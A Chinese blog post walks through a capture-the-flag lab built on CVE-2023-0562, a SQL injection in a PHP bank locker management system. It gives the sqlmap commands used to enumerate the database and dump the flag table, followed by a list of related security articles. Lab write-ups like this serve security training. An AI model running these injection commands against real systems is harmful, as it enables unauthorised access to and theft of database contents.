春秋云境CVE-2023-0562

简介

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

正文

进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。

找到注入点

发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap

开始抓包

sqlmap开爆

python sqlmap.py -r 2.txt -batch -dbs

python sqlmap.py -r 2.txt -batch -D blmsdb -tables

>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns

拿下靶场

python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump

相关推荐
JiaWen技术圈11 小时前
从零认识 OpenTelemetry (OTel)
运维·前端·安全
还是做不到嘛\.11 小时前
BUUCTF在线评测(web部分题)
安全·web安全
介一安全11 小时前
【Web安全】JWT常见安全漏洞总结
测试工具·安全·web安全·安全性测试
风途科技~11 小时前
山体边坡安全如何守护?地表裂缝监测站实时掌握形变动态
人工智能·安全
网安小学生(兼顾数据库版)11 小时前
主流SBOM生成工具横评:自动化、准确性与合规支持
网络·安全·自动化
@insist12311 小时前
信息安全工程师-网站安全顶层认知:威胁、需求与防护体系框架
网络·安全·web安全
@insist12311 小时前
信息安全工程师-Apache/IIS安全增强与OWASP漏洞防护
安全·apache·软考·信息安全工程师·软件水平考试
山川绿水19 小时前
bugku——PWN——overflow2
人工智能·web安全·网络安全
chipsense21 小时前
【安全警示】充电桩漏电保护正在被忽视:为什么B型剩余电流检测是强制刚需
安全·充电桩·漏电流检测
上海云盾-小余1 天前
内网边界安全管控:访问权限隔离与入侵阻断方案
网络·安全·web安全